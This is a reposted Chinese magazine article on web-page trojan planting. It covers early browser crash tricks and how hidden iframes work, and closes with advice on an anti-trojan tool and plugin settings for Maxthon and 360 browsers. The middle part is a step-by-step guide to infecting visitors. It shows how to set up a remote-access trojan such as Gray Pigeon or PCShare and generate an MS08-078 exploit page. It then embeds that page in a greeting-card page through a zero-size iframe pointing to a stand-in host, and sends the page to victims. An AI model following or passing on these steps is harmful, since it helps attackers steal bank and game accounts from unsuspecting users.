[转载] 黑客从这里开始挂马

黑客

◎文/苗得雨

网络挂马，在网络安全界中一直是一个长热不衰的话题，我们遍寻坊间的网络安全工程师和网络安全高手，想探寻网络挂马为什么总会保持有如此的热度。得到的答案直接而干脆，黑客想将自己的木马病毒传播给特定人群或者最广泛的特定人群时，所能够用到的方法只有网络挂马这一种，这也是为什么时至今日，网络挂马都在一刻不停的每天上演。
黎塞留在《政治遗嘱》中说：“正如同总不带武器的使命易于遭到灾祸一样，一个国家如果不时刻准备就会有许多恐惧”。对于一个网络安全工程师而言，网络挂马正是他们需要准备的，消除黑客威胁的核心知识。网络挂马不仅是黑客抓取肉鸡的主要方式，往往也会对缺乏防范的网站和服务器构成巨大威胁，让受害服务器成为病毒的源头，因此在新年伊始，我们将网络挂马列为了网络安全工程师首先需要掌握的基础知识之一，系统为大家介绍。

——苗得雨

3AST团队恶意代码分析员蓝海：从事网络安全行业近8年，资深安全工程师，**发现多个软件漏洞
进入互联网时代之后，病毒改变了以前主要依靠可执行文件传播的方式，开始通过电子邮件、软件漏洞、内网攻击、网页挂马等多种方式传播，将病毒传播的途径变得五花八门。不过在众多的传播方式中，黑客们仍然喜欢选用网页挂马，网页挂马不仅仅能够借刀杀人，借助用户信任的网站，让网络用户在不知不觉中中招。
而且随着近年来IE等浏览器的漏洞不断被发现，网页挂马的方法也越来越多，成功几率越来越高，传播范围也越来越广。不仅如此，可供黑客选择的“挂马套餐”足有上千种之多。因此，网页挂马成为了黑客传播病毒的主要手段，也成为了网络安全工程师在维护Web服务器和大型网络时必须具备的基础技能。
网络挂马攻击的危害性也很大，通常黑客选择网页挂马手段传播的病毒，几乎均为盗窃银行账号、网游账号，或者用户私密文档文件的木马型病毒，比起单纯的中病毒丢失数据的电脑用户，这部分被网页挂马攻击的用户损失更多的是真金白银的游戏装备和银行卡中的现金。

网页挂马缘起
互联网兴起之后，通过网站向访问者传播植入病毒的手段就随之出现了。国内大多数网民最早接触的网页病毒攻击来自著名的Windows 98 IE4.0浏览器中的一个漏洞，这个漏洞可以说最早揭开了国内黑客通过网页发动攻击的热潮。
该漏洞的利用方式非常简单，如同现在许多图片木马一样，只需要在HTML文件中写入<img src=c:\con\con>这段HTML代码，凡是Windows 98 IE4.0的用户此时再浏览打开包含这段代码的HTML文件，就会出现蓝屏死机现象。由于才做简单，这种恶作剧式的网页攻击方法当年风靡一时，导致众多网友在单击陌生链接时唯恐蓝屏

其实出现网络挂马这种现象，可以说是浏览器在一出生时就命中注定的，用户在浏览网页时，所看到的最终网页都是通过网络将服务器中的数据下载到自己的电脑中后再有浏览器解释生成的最终结果，因此网页中包含的各种代码就存在被黑客恶意构造的风险，很容易造成漏洞。
特别是当年的浏览器鼻祖Netscape网景公司在推出JavaScript语言时，设计人员就意识到如果允许网络服务器将可执行程序代码传递给用户的浏览器解释，很可能造成网络安全上的风险。其中最主要的风险莫过于不怀好意的网站会通过恶意代码窃取用户正在浏览的其它网站的秘密信息。虽然最后网景公司采用了各种限制手段，保证了JavaScript安全性，但是这种安全性也并不是绝对的，黑客最终还是能够通过各种网络机制中的弱点，和网页代码的漏洞，巧妙的盗取用户的机密信息，配合各种漏洞对网页用户发动攻击，这其中就包括网页挂马。

网页挂马原理揭秘
网页挂马到如今已经发展出许多方法与应用手段，从IFRAME框架，到利用JS文件调用网页木马，以至于在CSS文件中插入网页木马，或者伪装成图片，甚至利用SWF、RM、AVI等文件的弹窗功能来打开网页木马，都成为黑客经常使用的手段。在这其中IFRAME网页框架挂马是黑客最多用到的经典挂马方式，也是最基础的挂马方式，可以说没有IFRAME，网页木马中有一多半就无法实现完美的隐藏，让用户在不察觉中受到攻击。
IFRAME是一个非常普通的HTML语言标记，它主要用来在一个网页界面中，划分出左右或者上下的框架，就如同我们电视中的画中画效果一样，IFRAME允许网页中也出现一个框架，用来显示另外一个网页

但是IFRAME功能也被黑客巧妙的利用了，黑客在一些看似正常的网页中，使用大小为0的隐藏框架，让用户在没有察觉中打开含有漏洞溢出内容的恶意网页，这种手法就如同在画中画电视中打开了一个收费频道，但是由于收费频道的画面尺寸被恶意修改成了0，所以看电视的人并不知道自己已经打开了收费频道，因为他并没有看到，但是事实上收费频道却的确在播放，而且会收扣除用户的使用费
IFRAME框架挂马实战
每当年景不景气时，黑客病毒等恶意攻击事件就会接连不断的出现，“黑色星期五”病毒就是最好的证明，据说该病毒的制造者就是因为老板辞退而编写了这样一个贻害人间的病毒。2008年的金融危机有让一大批计算机工程师将无聊都发泄在了制造病毒上，特别是2008年底，圣诞老人送给黑客们的MS08-078漏洞，就是一个非常好的挂马利用方法，下面我们就为大家演示一下如何利用软件漏洞，配合IFRAME标记，进行隐藏的框架挂马。下面我们做过做个演示，比如我们将保存在电脑中的Google网页中插入如下代码：
<iframe src=http://blog.sina.com.cn/deyumiao width=400 height=300></iframe>

第一步：首先准备一款得心应手的木马，黑客通常会首选灰鸽子和PCShare，这两款软件在设置上都非常简单，易于操作上手。设置好相关服务，最后声称木马所用的服务控制端

第二步：使用FTP将木马上传到自己的网站空间中，并用记事本记录下木马的网络路径。然后在用MS08-078网页木马生成器，生成一个带有MS08-078漏洞的恶意网页。
第三步：找一个正常的新年贺卡网页，将该网页保存到自己指定的目录中，然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改，然后上传到自己的网站空间中，看图片等内容是否能够正常显示
第四步：然后再一次打开修改好的贺卡网页，使用IFRAME标记语句，将生成好的MS08-078网页嵌入到贺卡网页中，嵌入挂马代码如下：
<iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>
将这段代码插入到贺卡网页之中后，就完成了我们的网页挂马操作。这段代码让正常浏览贺卡网页的用户，在看到贺卡页面之后，也随之运行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出页面，但是由于它的长和宽都为“0”，观看贺卡网站的用户不会看到溢出页面，因此非常隐蔽。此时我们的网页挂马页面就完成了，只需要将这个页面发送给其他人，那些没有修补MS08-078漏洞的用户，就会在不知不觉中，中黑客设定的木马。

防范方法
对于IFRAME标记这种利用正常HTML语言功能实现隐藏的挂马方式，目前并没有好的防范方法，因为它是正常的网页功能。用户只能够寄希望杀毒软件和防挂马软件阻止利用IFRAME标记内嵌的溢出病毒网页。
我们建议用户在安装杀毒软件之后，能够安装第三方防挂马软件作为补充，下列就是我们测试的一些具有防挂马功能的免费软件。
3AST（下载地址：http://www.3ast.com.cn/download.html）就可以帮助你防御网页中的木马，安装后无须任何设置，自动检测网页危险，遇到挂马、带毒网站时会屏蔽并提示见图，还能自动修补漏洞。知识目前默认只支持IE系列浏览器，不过通过巧妙的设置，还可以让其支持更多的浏览器。

实例1
移花接木保卫遨游Maxthon
如果你一直使用Maxthon 2.0浏览器，可以通过下面的步骤让3AST支持Maxthon2：
第一步：将“plugin.ini.rar”（下载地址：http://work.newhua.com/cfan/200902/cj.rar，快车代码：CF0902CFRJ04）解压后得到“plugin.ini”文件复制到3AST程序安装目录下的“AModule”（默认位置为：C:\Program Files\ARaymor\Amodule），接下来再将“AModule”文件夹复制到Maxthon2.0安装目录下的“plugin”文件夹中，再将其重命名为“Araymor”。
第二步：接下来再打开Maxthon2.0安装目录，找到自己的Maxthon账号对应的文件夹（如果没有注册Maxthon2.0账号，请打开SharedAccount文件夹）并打开“Config”文件夹，使用记事本程序打开“plugin.ini”文件，找到[Paths]节，直接增加：ARaymor=1，保存并退出该文件。
经过上面的两步设置后重新启动Maxthon就可以享用3AST对网页挂马的防御了。

实例2
画龙点睛又多俩同胞
如果你使用的是360安全浏览器，只要直接打开360安全浏览器的安装目录，用记事本程序打开“360SE.ini”，然后将下面的内容添加到文件末尾，最后保存该配置文件即可：
[PlugIn]
{53BEAA3C-A509-49AD-ACC3-553AD20DA38B}BHO=1
世界之窗的添加方式类似，只需在其安装目录打开它的“TheWorld.ini”文件，将右边的内容添加进入即可。